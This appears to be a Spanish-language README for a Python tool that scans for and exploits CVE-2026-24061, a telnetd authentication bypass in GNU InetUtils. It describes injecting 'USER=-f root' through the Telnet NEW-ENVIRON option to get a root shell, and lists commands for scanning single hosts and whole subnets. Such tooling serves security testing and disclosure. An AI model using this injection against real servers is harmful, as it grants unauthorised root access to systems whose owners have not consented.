
CVE-2026-24061 — Escáner de Bypass de Autenticación de Telnetd de GNU InetUtils
Un escáner de seguridad basado en Python que detecta y explota CVE-2026-24061, una vulnerabilidad crítica (CVSS 9.8) de omisión de autenticación en versiones 1.9.3 a 2.7 del telnetd de GNU InetUtils.
El escáner inyecta un valor malicioso USER=-f root a través de la opción NEW-ENVIRON de Telnet (RFC 1572), engañando al servidor para que omita la autenticación y otorgue un shell de root.
id# Scan single target
sudo python3 telnetd_scanner.py -t 192.168.56.101 -p 23 -v
# Scan entire subnet
sudo python3 telnetd_scanner.py -t 192.168.56.0/24 --threads 30
# Save report
sudo python3 telnetd_scanner.py -t 192.168.56.101 -o report.txt
# JSON output
sudo python3 telnetd_scanner.py -t 192.168.56.101 --format json -o report.json
| Software | Vulnerable | Parcheado |
|---|---|---|
| GNU InetUtils telnetd | <= 2.7 | >= 2.8 |
Esta herramienta es solo para investigación de seguridad autorizada y fines educativos. No la utilice contra sistemas que no posea o para los que no tenga permiso explícito de prueba.
Ahmad Sadeeq